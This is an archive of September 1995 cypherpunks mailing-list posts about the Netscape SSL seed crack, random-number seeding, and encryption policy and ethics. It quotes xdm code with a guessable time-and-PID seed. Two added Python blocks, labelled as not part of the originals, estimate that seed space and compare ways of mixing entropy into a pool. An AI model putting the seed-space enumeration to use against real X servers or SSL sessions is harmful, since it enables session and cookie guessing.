>opinion, not an official position of netscape).

The ipsec people are currently debating what it means to do replay detection
on an unreliable datagram service, what it means to authenticate 
individual users in a layer that only knows how to name host endpoints, how
a protocol specification deals with how policy would be set for mixed 
encryption service requirements, etc.  This is not the first time these 
points have been debated in the history of the universe, nor the first 
attempt at a 'one size fits all' security protocol.

I, personally, would not be too quick to expect IP security to solve all of 
your problems, but it will do a better job on, say, host-to-host disclosure 
protection.  It will, however, require new kernel code or low-level 
driver or hardware hacks,  which simultaneously provide the better 
protection and a barrier to security deployment for a product like 
Netscape's.

Now, how about fixing SSL's keying so it has perfect forward secrecy?

-Joe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 21 Sep 95 11:46:24 PDT
To: cypherpunks@toad.com
Subject: Netscape closes up 1 3/8 today!
Message-ID: <199509211846.LAA04164@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DF84AJ.41K@sgi.sgi.com>, carolann@censored.org (Censored Girls Anonymous) writes:

> Lookit that! 416 trades and 11 times there was more
> buying pressure than selling pressure..

> The rumors of bug fix are outweighing the facts of the crack!

> I am totally amazed! But think company insiders are probably
> supporting the stock.  Holding up better than ascii armor, it is. 

I think it probably has more to do with the fact that the name
"Netscape" has been on the front page of every major newspaper in the
US.  I guess bad press is better than no press at all.  And the press
hasn't even been that bad.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 21 Sep 95 08:50:26 PDT
To: cypherpunks@toad.com
Subject: XDM has the same problem as netscape ?!
In-Reply-To: <199509202041.NAA07036@comsec.com>
Message-ID: <43s1j7$nd3@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509210631.AA18308@sfi.santafe.edu>,
Nelson Minar <nelson@santafe.edu> wrote:
>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
>the same problem: the random seed was based on the current time to the
>microsecond, modulo the granularity of the system clock. I think I
>figured that on my hardware, if I could figure out which minute the X
>server started (easy with finger), I'd only have to try a few
>thousand keys or so. Caveat: I never actually proved the idea.

Wow.  I just checked, and Nelson's right.

The seed is this:
#ifdef ITIMER_REAL
    {
        struct timeval  now;

        X_GETTIMEOFDAY (&now);
        ldata[0] = now.tv_sec;
        ldata[1] = now.tv_usec;
    }
#else
    {
        long    time ();

        ldata[0] = time ((long *) 0);
        ldata[1] = getpid ();
    }
#endif

and if you don't have XDMAUTH defined, the auth value is this:

        seed = (ldata[0]) + (ldata[1] << 16);
        srand (seed);
        for (i = 0; i < len; i++)
        {
            value = rand ();
            auth[i] = value & 0xff;
        }


Oh, well.  We knew X didn't have much in the way of security, anyway...

   - Ian
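
How small the seed space in the xdm excerpt above is, as an added example (not part of the original post and not xdm code): it counts the distinct values `srand()` can receive when the start time is known, and sets the result beside a cookie drawn from the OS CSPRNG. The 32-bit truncation, the 100 Hz clock tick, the PID ceiling of 30000, the 16-byte cookie length, the sample start time and all function names are assumptions.

```python
import math
import secrets

MASK32 = 0xFFFFFFFF          # assumption: srand() receives a 32-bit unsigned int
SAMPLE_START = 811_641_600   # constructed sample: a Unix time in September 1995


def xdm_seed(word0: int, word1: int) -> int:
    """seed = ldata[0] + (ldata[1] << 16), truncated the way srand() truncates it."""
    return (word0 + (word1 << 16)) & MASK32


def seeds_timer_branch(start_sec: int, window_sec: int, tick_usec: int) -> set:
    """ITIMER_REAL branch: ldata = (tv_sec, tv_usec), tv_usec moving one tick at a time."""
    return {
        xdm_seed(sec, usec)
        for sec in range(start_sec, start_sec + window_sec)
        for usec in range(0, 1_000_000, tick_usec)
    }


def seeds_pid_branch(start_sec: int, window_sec: int, pid_max: int) -> set:
    """Fallback branch: ldata = (time(), getpid())."""
    return {
        xdm_seed(sec, pid)
        for sec in range(start_sec, start_sec + window_sec)
        for pid in range(1, pid_max + 1)
    }


def cookie_bits(seed_count: int, cookie_len: int = 16) -> float:
    """Upper bound on cookie entropy: every byte of auth[] is a function of the seed."""
    return min(math.log2(seed_count), 8.0 * cookie_len)


def csprng_cookie(cookie_len: int = 16) -> bytes:
    """Corrected generation: take the cookie bytes directly from the OS CSPRNG."""
    return secrets.token_bytes(cookie_len)


def report() -> dict:
    """Entropy bound in bits for each case, under the assumptions stated above."""
    return {
        # Start time known to the minute, clock advancing in 10 ms ticks.
        "timer branch, 100 Hz tick, known minute":
            cookie_bits(len(seeds_timer_branch(SAMPLE_START, 60, 10_000))),
        # Even a true microsecond clock keeps only the low 16 bits of tv_usec,
        # because the << 16 pushes the rest out of a 32-bit seed.
        "timer branch, 1 us tick, known second":
            cookie_bits(len(seeds_timer_branch(SAMPLE_START, 1, 1))),
        "pid branch, known minute":
            cookie_bits(len(seeds_pid_branch(SAMPLE_START, 60, 30_000))),
        "OS CSPRNG, 16 bytes": 8.0 * len(csprng_cookie()),
    }


if __name__ == "__main__":
    for case, bits in report().items():
        print(f"{case:42s} <= {bits:6.2f} bits")
```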




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 21 Sep 95 11:53:38 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509210958.TAA10764@sweeney.cs.monash.edu.au>
Message-ID: <199509211852.LAA22259@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| > Of course you have to be very careful, as you say. Did you see my
| > problem-section in the original letter? I included it above.
| ... [the referenced section elided by jirib] ...
| 
| If I only ever give out a hash of my seed, and only ever *add* any received
| info to my seed (and stir it in well), how can anyone find out anything?
| (Apart from hash weaknesses.)

Giving out contribution: 
     MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
Taking in contribution : 
     my_seed = my_seed XOR 
     ((select_low_bits(remote_contrib, contrib_width) << contrib_area)

You also need to keep track of who has contributed what, and how much.
This might become a problem if you don't have a safe authentication
mechanism, like basing the tracking on the IP-numbers etc.

But I don't believe this is a real problem, since you always
contribute 'entropy', not exact values. You need to know the exact
state of the random generator to be able to predict how your
contribution will affect the generator.

The boot-strap stage is actually the big problem still. But if the
initial stages are 'random enough' to withstand a total crack, I guess
the randomness gathered will increase rapidly, and increase the
safety a lot.

| The only thing that remains is that I cannot really count on a stranger
| to actually give me something truly random. In fact, since at least
| one other person knows it, I shouldn't count any entropy from it at all.
|
| However, if I get e bits from each of n servers, and k of them are rogue,
| then I have e*(n-k) bits, ie e*n*(1-k/n). With a suitably conservative
| estimate of k/n, this should be acceptable.
| 
| In any case, accepting donations of entropy cannot possibly reduce the
| amount of entropy I have, can it?

This isn't a problem as I see it, he'll only know what bits he
flipped, not the actual state.

I guess someone could mount an attack on the remote_contrib, finding
the part of my_seed by bruting the remote_contrib that I submitted.
But even if that is done, you'll only know a small part of the total
seed. And the remote end can't choose which segment of my_seed that
will be revealed.

I also see a problem if an attacker is controlling the whole
environment, but this is no different from the original problem, and
a lot more unlikely.

| > and that you should only give out approximately the same amount of 
| > randomness to the neighbour, as you point out below.
| ...
| 
| I'm not sure I follow this one. Why?
| 
| If the neighbour is willing to trust me for more, and cannot possibly
| deduce my seed from the numbers ('cause it's a strong 1-way hash),
| the only thing it costs me is CPU time - it'd cost me more to keep
| track of who asked for how much when.

Well, the reason would be that if someone bruted your contribution,
they would still have to guess the remaining part. Double safe! :-)

| ...
| > My approach solves part of the problem of "the observable local
| > environment" problem. 
| ...
| 
| Then again, you can always ping. With a well-chosen target, you get
| 10 bits raw from the first packet... Perhaps about 7 or 8 of actual
| usable entropy (and before you flame me, ping melb.dialix.oz.au).

Yes, but if one assumes that the algorithm to gather the seed is
known, it's quite possible for someone else to do it at the same time
as you do it, or even observe your ping packet req/reply. And how do
you determine which 'random host' to ping?

| Part of this is that once the sources of randomness are sufficiently
| diverse, it's just easier for an attacker to modify your s/w.
| Especially if you never throw out your seed, so that all your interactions
| since the beginning are unfathomably stirred into your current key.

Yes, I believe this is important too.

/Christian
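
The intake rules discussed in this thread, compared against a remote party that chooses its own contribution; this is an added example, not code from any of the posters. It contrasts overwriting, the direct XOR intake from the message above (simplified to full width, without the bit selection and shift), and Frank Stevenson's `B = B xor Hash(A,B,C,D, fresh)`. SHA-256 stands in for the unspecified hash, and the 16-byte width, the sample values and all function names are assumptions.

```python
import hashlib

STATE_BYTES = 16                     # width of pool part B (assumption)
ZERO_B = bytes(STATE_BYTES)          # B at bootstrap, before anything was mixed in
SECRET_B = hashlib.sha256(b"constructed local secret").digest()[:STATE_BYTES]
TARGET = b"\xaa" * STATE_BYTES       # value the remote party wants B to hold


def xor_bytes(x: bytes, y: bytes) -> bytes:
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(p ^ q for p, q in zip(x, y))


def digest(*parts: bytes) -> bytes:
    """SHA-256 over length-prefixed parts (stand-in for the thread's 'Hash')."""
    m = hashlib.sha256()
    for part in parts:
        m.update(len(part).to_bytes(4, "big"))
        m.update(part)
    return m.digest()


# Three ways to take a remote contribution `fresh` into pool part B.
def overwrite(a, b, c, d, fresh):
    return fresh[:len(b)]                            # remote value replaces B


def xor_in(a, b, c, d, fresh):
    return xor_bytes(b, fresh)                       # direct XOR intake


def hashed(a, b, c, d, fresh):
    return xor_bytes(b, digest(a, b, c, d, fresh))   # B = B xor Hash(A,B,C,D,fresh)


def can_steer(rule, b_start: bytes, knows_b: bool) -> bool:
    """True if a remote party choosing `fresh` can force B to TARGET.

    A, C and D are local material the remote party never sees.
    """
    a = b"keystroke timing samples"                  # constructed sample values
    c = b"time, pid, ppid"
    d = b"other local material"
    candidates = [TARGET]                            # works if B is replaced
    if knows_b:
        candidates.append(xor_bytes(TARGET, b_start))   # works if B is XORed
    return any(rule(a, b_start, c, d, fresh) == TARGET for fresh in candidates)


def reachable_states(rule, bits: int = 12) -> int:
    """Distinct next states over all 2**bits values of a toy B, for one fixed input.

    Equal to 2**bits when the rule is a bijection on B (no state is lost).
    """
    width = (bits + 7) // 8
    mask = (1 << bits) - 1
    fresh = (0x5A5).to_bytes(width, "big")           # constructed fixed contribution
    seen = set()
    for s in range(1 << bits):
        nxt = rule(b"", s.to_bytes(width, "big"), b"", b"", fresh)
        seen.add(int.from_bytes(nxt[:width], "big") & mask)
    return len(seen)


if __name__ == "__main__":
    print("overwrite, B unknown :", can_steer(overwrite, SECRET_B, False))
    print("xor,       B unknown :", can_steer(xor_in, SECRET_B, False))
    print("xor,       bootstrap :", can_steer(xor_in, ZERO_B, True))
    print("hashed,    bootstrap :", can_steer(hashed, ZERO_B, True))
    for rule in (overwrite, xor_in, hashed):
        print(f"{rule.__name__:9s} keeps {reachable_states(rule)} of 4096 toy states")
```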




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Wed, 20 Sep 95 20:38:49 PDT
To: cypherpunks@toad.com
Subject: Random Number State
In-Reply-To: <9509202150.AA08164@toad.com>
Message-ID: <Pine.SOL.3.91.950921113535.21127D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Some ramblings on the RNG seeding issue, comments welcome.

I'm sort of in the position of Netscape in that I have an SSL library 
that needs good random numbers for both RSA key generation (soon DH)
and SSL sessions.
While most of the discussions have been how to generate random data, one 
solution I will probably follow is that when any 'semi-random' data is 
generated, make sure to save this for seed data the next time the
application starts.  I have faith in the RNG capabilities of my RNG (based 
on MD5) and my RAND_seed() routine only 'adds' to the RNG state (about 
1k's worth is kept).  I can continue to 'mix' the RNG state at any point in 
time.  My RND_seed() xors into the existing state, it does not overwrite.

Because my SSL/encryption library contains 'everything', I have the
ability to put calls to my RNG_seed() routine in places like when I 
decrypt a private key.  I can pass both the password (if the key was 
encrypted) and the private key 
into the RNG state (making sure any data that goes into the RNG state 
can not be determined if a 'core' file is generated).
I will probably also put the time() into the RNG state whenever an 
SSL_connect or SSL_accept is made (I think I do already).  I may also put in 
select data that has been read from the remote host.
While most of this data can be determined by watching 
network activity, if it is just a delta to the initial random 
state it is somewhat more useful.

The first time user 'x' runs the application they are made to 'generate' 
some reasonable random data.  For all subsequent executions of the 
program, any more semi (pseudo?) random data generated can be mixed in 
with the initial random data.  The profile of the usage of the 
application would end up determining the random data to use.

I feel it is a bit much to try to generate good random data every time 
an application is run.

I believe this is the type of approach PGP uses (I have not looked at the 
code).

eric
PS  I also do some 'evil' things in that I load 'garbage' bytes from the 
    stack into my RNG state whenever the RNG is called.  It may not be 
    random, but I bet it is hard to determine from the outside the 
    running program :-)  It can only help :-).
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 21 Sep 95 12:08:04 PDT
To: shields@tembel.org (Michael Shields)
Subject: Re: MIME
Message-ID: <199509211907.MAA18407@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:24 AM 9/21/95 +0000, shields@tembel.org (Michael Shields) wrote:
>> >I think that it must be the content-type that is causing problems,
>> Yes, I agree. Make it something like ASCII text

>But it's not text/plain.  It's PGP'ed text/plain.  The only way to
>indicate this in MIME is with a content-type.  (Yes, they're working on
>a general way to encapsulate encryption.)

Part of the problem is that application/pgp is being used both for
encrypted data and also for clearsigned data, which really have different
handling needs.  With clearsigned, you might want to read it,
but might also want to PGP it.

One possibility is to do multipart messages with the body in one part
and a detached signature in another.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 21 Sep 95 12:07:47 PDT
To: cypherpunks@toad.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <199509211907.MAA18413@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:50 PM 9/20/95 -0700, you wrote:
> In this sense, NSA ought to be *encouraging* Intel and
>IBM and Motorola to put "generate random bits" instructions into
>their instruction sets...

Is _that_ what was going on with Pentium division?  
Less seriously, though, a UART might be a good place to add a random
number source, since it may be able to extract randomness from communication
line jitter, is usually an easily replaceable part on most machines,
and communicates at a higher speed than you're likely to need for
most randomness applications.

#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: microbody@wirepool.ruhr.de (Matthias Jordan)
Date: Fri, 22 Sep 95 12:06:19 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape sub rosa?
In-Reply-To: <ac850f682a021004638e@[205.199.118.202]>
Message-ID: <5uIxesBWJ2B@blank.wirepool.ruhr.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello, Tim!

> Gee, where's that "Cypherpunks logo" when you really need it?
> 
> A rose covering the Netscape "N" logo? A crypto eagle swooping down and
> pecking at weak keys?

How about an anarchism-A (an A in a circle) with the circle not
being totally closed thus describing a C?
CU!

  /\/\icroBod\/     |\?/|  SoziBits <----    Anschlaege Drogen Waffen
 /    \______/      | I |  Falken im Netz    RAF ETA KGB LSD XTC BND
                      ^
PGP2.3a key per EmpfBest.  ---  Frag' mich nach PGP
-- Wer vom Kapitalismus nicht reden will, sollte vom Faschismus schweigen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 21 Sep 95 09:35:06 PDT
To: cypherpunks@toad.com
Subject: Re: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <43s46q$3qs@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509211130.HAA20039@light.lightlink.com>,
 <anonymous@freezone.remailer> wrote:
>NY Times, Sept 21, 1995.
>
>Fraud Can Flourish Without the Internet
>
>To the Editor:
>
[snip]
>
>Or is the banking industry whipping up hysteria among
>purchasers to curb fraud losses? Was the work of those
>graduate students funded by someone -- directly or indirectly?
>If so, by whom? A banking consortium? A high-tech company
>working on some patentable security scheme?

The work we did was not funded by anyone.  If someone out there would
care to rectify this situation, he can let us know. :-)

   - Ian "Grad students are not notoriously wealthy in this country,
            either, right?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 21 Sep 95 12:46:43 PDT
To: cypherpunks@toad.com
Subject: economic espionage (@#$%^&*)
In-Reply-To: <9509201546405398@ci.diamond-bar.ca.us>
Message-ID: <199509211936.MAA23834@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> >It was said that Pres. Clinton had given a speech while 
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
>> >said in this speech that obtaining  industrial 
>> >informations has the highest priority and this were the 
>> >new  task for the spies.

ah yes, just like the way Clinton alone came up with the whole
Clipper idea as a way to balance the legitimate goals
of law enforcement with the right to privacy in society.

careful Bill, your strings are showing. and I won't say 
who is the puppeteer, but he has the initials N.S.A.

pardon me, but this new "economic espionage" sleazoid-intelligence-
agency-justifying bugaboo really annoys me.

boy, I wish I could get my job to work the way the government
works. I go to my boss, and say, "repeat after me: you will
be given a fat raise because you are crucial to the company".

I would *die* to see an op-ed in the NYT with the subject:
"economic espionage: the new bogeyman decoy after the cold war"







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@netcom.com (David Lesher)
Date: Thu, 21 Sep 95 09:52:22 PDT
To: cypherpunks@toad.com
Subject: Council of Europe proposes to outlaw strong encryption (fwd)
Message-ID: <199509211649.MAA11243@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


**********************************************************

> SUBJECT: Euroclipper
> Apologies if this is old news to you folks, but thought I should              
> pass it on.


Date: Thu, 21 Sep 1995 00:42:39 -0400                                          
Subject: IP: Council of Europe proposes to outlaw strong encryption            
                                                                               
According to an article in `Communications Week International', the            
34-nation Council of Europe has agreed to outlaw strong encryption             
products which do not make keys available to governments.                      
                                                                               
The article, `Euro-Clipper chip scheme proposed', is on the front page         
of the magazine's issue 151, dated 18th September, which arrived in my         
mail this morning.                                                             
                                                                               
It relates that the policy was approved on the 8th September at                
Strasbourg by the Council, and coincides with an attempt by the                
European Commission to propose a pan-European encryption standard. The         
Council - unlike the Commission - has no statutory powers to enforce           
its recommendations. However, Peter Csonka, the chairman of the                
committee that drafted the document (and an administrative officer at          
the Council's division of crime problems) says that `it is rare for            
countries to reject Council of Europe recommendations'.                        
                                                                               
The proposal would make telecomms operators responsible for decrypting         
traffic and supplying it to governments when asked.  It would also             
`change national laws to enable judicial authorities to chase hackers          
across borders'.                                                               
                                                                               
Opposition to this measure was expressed by Mike Strezbek, VP                  
responsible for European telecomms at JP Morgan, who said that his             
organisation `will challenge any attempt to limit the power of our             
network encryption technologies very strongly'.                                
                                                                               
Csonka said that the Council had given consideration to business
interests but had tried to strike a balance between privacy and
justice. However, `it remains possible that cryptography is available          
to the public which cannot be deciphered,' his document says. `This            
might lead to the conclusion to put restrictions on the possession,            
distribution, or use of cryptography.'                                         
                                                                               
Apparently another international organisation, the OECD, has called a          
conference of its members in December to devise a strategy on                  
encryption.                                                                    
                                                                               
I for one will be making clear to my MP that his stand on this issue           
will determine how I cast my ballot at the next election. I note that          
John Major stated in a 1994 parliamentary written reply to David Shaw          
MP that the government did not intend to legislate on data encryption.         
I am disappointed that government policy has changed to the point of
supporting the Council of Europe, and that this change has sneaked             
through during the parliamentary recess.                                       
                                                                               
Ross Anderson                                                                  
                                                                               
                                                                               



------- End of Forwarded Message



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close...........(v)301 56 LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead........vr vr vr vr.................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s675570@aix2.uottawa.ca
Date: Thu, 21 Sep 95 09:53:32 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . . (or the joys of boating)
Message-ID: <Pine.3.89.9509211226.A29553-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 21 Sep 1995, Landon Dyer wrote:

>   naturally, commuting to canada is probably a *lot* cheaper than
> owning a boat.  the uninitiated have little idea what these holes-
> in-the-water really cost.... :-)

*Loud* chuckles. Who says you have to *own* the boat? (haha) A suitably
paid Canadian boat-captain could easily testify that you arrived every day
to the boat with your trusty laptop, to develop your software within Canada.

The disk with your saved code on it never left the boat. When you 
finished your development, you used a borrowed satellite phone to call up
your ISP in Canada (we're talking physical Canada, not virtual, maritime, and
bullshit Canada) to post your code and uuencoded executables to sci.crypt,
and alt.test. And since you used a satellite phone, for the modem 
transmission, no US phone lines were used (a cellphone wouldn't do). 

Of course you wouldn't actually have to do any of this. The gentleman just
has to say it in court. The truth, the whole truth and nothing but.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 13:07:03 PDT
To: cypherpunks@toad.com
Subject: Prosecution of Cracking Security Systems
Message-ID: <ac87102143021004d973@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:42 PM 9/20/95, Brian Davis wrote:

>Certainly, Cypherpunks has gotten press lately, and what I've seen has
>been good press.  Capitalize on it.
>
>Finally, I've got to say that, as someone new to the concepts discussed
>here, I found it extremely cool to read about the latest break here and
>then see it in the news a day or two later.


Indeed, it gives you a day's head start in preparing a prosecution!

(Just kidding, of course. Brian may be a DA, but he's showing signs of
being "one of us.")

And on a serious note, the cracks of these various systems are helpful to
the overall community. Better locks.

To pick up on a point Brian made several days ago about whether or not
hackers who break into systems should be applauded, criticized, prosecuted,
whatever, this is how I see things, in direct parallel with the recent
Netscape cracks:

* Situation 1: A person who enters my home by bypassing locks cannot claim
to be "just testing security" and should be prosecuted for trespass, if
nothing else.

* Situation 2: However, a person who publicly demonstrates that a
well-known type of lock is weak and can be easily bypassed is well within
his rights and is, I think, doing the community a favor. I mean that he
demonstrates this on a lock, or system, and not by breaking into a system.
(It may be true that some number of potential thieves use the knowledge
that a given lock is weak to commit crimes, but that's not the
responsibility of the person demonstrating the weakness.)

(Sidebar: There are some subtleties. What about someone who breaks into a
computer system and leaves a harmless message announcing his intrusion?
What about someone who enters my house while I'm asleep and leaves a
message saying "Get better locks!"? What about Randall Schwartz and his
security checks of his employer, Intel?)

It seems clear to me that the breaking of Netscape's security is an example
of Situation 2. And many cracker break-ins are Situation 1, though in many
cases the crackers are not full-fledged criminals and may think they are
just testing security. (This goes to motive, I'm sure Brian would agree,
and may be why a 16-year-old cracker gets a suspended sentence instead of
hard time.)

(A more problematic case is what about systems with very weak or no
security? This is somewhat like a yard with no clearly marked boundary, no
fence, etc., or like a beach towel with valuables left on it. We've
debated issues like this several times on the Cyberia list, so I won't
here.)

One thing that worries me is that some of the proposed laws about
intellectual property and enforcement of copyrights may make it illegal to
try to break the cryptographic protections of systems, even systems one has
control over. (Some similarities to the "no reverse engineering"
shrink-wrap licenses.)

It's conceivable that Netscape Communications could, under these
"anti-hacking" laws, seek a prosecution of some future Goldberg and Wagner.

My guiding principles about locks and security are these:

* Theft is theft, even if a bicycle is left unlocked or a house door is
left ajar.

* However, the first line of defense is for a property owner to lock his
property up, to place fences around property, etc. Cops cannot protect in
all situations, which is why security services and tools exist.

* Since enforcement resources are limited, I can understand why the
investigation of a theft involving unlocked, unsecured property is given
low priority. This doesn't make the theft "right," and if the thief is
somehow caught he cannot use the "But it was unlocked!" defense.

(These problems are lessened in a system where people pay for protection,
as with insurance systems, and of course as with anarcho-capitalism of the
sort discussed by Benson, Friedman, and others.)

--Tim May




Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 13:17:27 PDT
To: cypherpunks@toad.com
Subject: "Gnusaic"? Why not a Gnu-Style Web Browser?
Message-ID: <ac87162a440210044474@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I'm pretty happy with Netscape 1.1N, but John Gilmore's point about NCSA
Mosaic gives me a thought:

At 6:44 AM GMT 9/21/95, John Gilmore wrote:

>>   I realize that some cypherpunks think that we should make all of
>> our code publicly available.  In an ideal world that would be great,
>> but we live in a world with politicians, crooks, lawyers, stockholders,
>> etc...  Don't expect to see us posting our entire security
>> library source code to cypherpunks.
>
>Naah.  I think NCSA should've made Mosaic publicly available, because
>they wrote it with our tax dollars.  And I hold it against them that
>they started the trend of "zero-cost personal-use binaries but no
>commercial use" that many Net users still confuse with Real Free
>Software (free as in freedom).  But Netscape owns its code, it can do
>whatever it wants with it.

Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
used and added to, but I can imagine something like this could be done.

Web browsers are becoming, for many of us, our de facto interfaces to the
Net, not just the Web. A project to make a truly freely distributable Web
browser and Web server (the other part of the puzzle) could be interesting.
Strong crypto could be added by volunteers working in their specialties,
and the "Web proxy" could be put in with robustness (D-H forward secrecy,
for example).

I'll stop now, as I've never been a Gnu customer (except for Emacs), and so
I'm not really in a position to comment and speculate on Gnu.

For all I know, Stallman and others have already thought of this and are
working on it.

--Tim May


Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Vaughn <robv@teleport.com>
Date: Thu, 21 Sep 95 13:31:56 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: NYT on Netscape Crack
Message-ID: <199509212030.NAA17997@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry sez:

>I'll pay for the "I broke Netscape's Security" T-Shirt for the
>enterprising person that takes the time to find them in the object
>code. (See Sameer's page on the shirts he's developing as prizes for
>the Netscape flaw finders.)

I find it very ironic that a company that recently raised about a
gadzillion dollars through a public stock offering has been able to
sit back and let people find problems with their software for free.
Now people like Sameer and Perry are offering rewards for it.  Kudos
to them, but I think Netscape should be the one making an offer like
this.

A textbook author/prof who taught a class using his own book had a
great method for finding mistakes in the new edition: he had us buy
the current edition and gave us copies of each chapter of the new
edition as we got to it, then he offered a $10 reward for each typo or
mistake found, and a $100 dinner for two and credit in the new edition to
whoever found the most mistakes by the end of the semester.  I made $160
before I had to drop the class due to a schedule conflict.

In the end, he said he was able to find over 100 errors, and considered it
the cheapest and most thorough proofreading he'd ever paid for.  And the
class got a big charge out of it.

Netscape should be offering rewards for people who find problems with
their software.  They'll get a lot of hard work for almost free (since
you only get paid if you do find something) and in a year or two they'll
have one of the most solid applications on the market.  Lord knows it'll
help raise public confidence too.  If a tee-shirt motivates people, think
what $US 1000 reward would do.  Or $e 2000 in credit towards goods
purchased through Netscape commercial servers?

Rob V.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 13:35:47 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <199509211846.LAA04164@orac.engr.sgi.com>
Message-ID: <199509212030.NAA05084@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The only bad publicity is no publicity.


> 
> In article <DF84AJ.41K@sgi.sgi.com>, carolann@censored.org (Censored Girls Anonymous) writes:
> 
> > Lookit that! 416 trades and 11 times there was more
> > buying pressure than selling pressure..
> 
> > The rumors of bug fix are outweighing the facts of the crack!
> 
> > I am totally amazed! But think company insiders are probably
> > supporting the stock.  Holding up better than ascii armor, it is. 
> 
> I think it probably has more to do with the fact that the name
> "Netscape" has been on the front page of every major newspaper in the
> US.  I guess bad press is better than no press at all.  And the press
> hasn't even been that bad.
> 
> -- 
> Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
> we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



